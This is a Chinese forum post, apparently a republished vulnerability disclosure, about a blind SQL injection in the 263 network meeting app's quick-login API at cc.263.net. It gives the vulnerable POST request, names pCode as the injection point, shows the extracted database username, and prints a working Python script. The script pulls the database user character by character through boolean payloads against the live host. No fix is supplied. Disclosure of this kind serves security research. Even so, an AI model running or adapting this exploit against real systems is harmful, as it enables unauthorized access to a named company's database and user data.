HanDs
管理员

[7月漏洞公开] 263通信某APP一处SQL盲注(附验证脚本) 



详细说明:

263网络会议 3.0

http://www.263.net/263/download/

0.jpg





下载APP,"快速入会"功能,接口:

code 区域
POST http://cc.263.net/rest/netmeeting/quickLoginNet HTTP/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 65
Host: cc.263.net
Connection: Keep-Alive

{"pCode":"46867588","username":"lisi","clientType":10}





注入点:pCode



bool盲注。



false:

1.jpg





true:

2.jpg





数据库用户:

code 区域
[email protected]



3.jpg

漏洞证明:

python验证脚本:

code 区域
headers = {'Content-Type': 'application/json;charset=UTF-8'} 

payloads = 'ABCDEFGHIJKLMNOPQRSTYVWXYZ0123456789@_.'

print '[%s] Start to retrive db User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
isEnd=False
for i in range(1, 36):
if isEnd:
break
isEnd=True
for payload in payloads:
url='/rest/netmeeting/quickLoginNet'
start_time=time.time()
data='{"pCode":"46867588\' or MID(user(),'+str(i)+',1)=\''+payload+'","username":"lisi","clientType":10}'
conn = httplib.HTTPConnection('cc.263.net', timeout=60)
conn.request(method='POST',url=url,body=data, headers=headers)
html_doc = conn.getresponse().read()
conn.close()
print '.',
if(html_doc.find('80007')>0):
isEnd=False
user += payload
print '\n[in progress]', user,
break
time.sleep(0.1)
print '\n[Done] db user is %s' % user
time.sleep(20)

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
263 通信某 APP 一处 SQL 盲注 附验证脚本
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复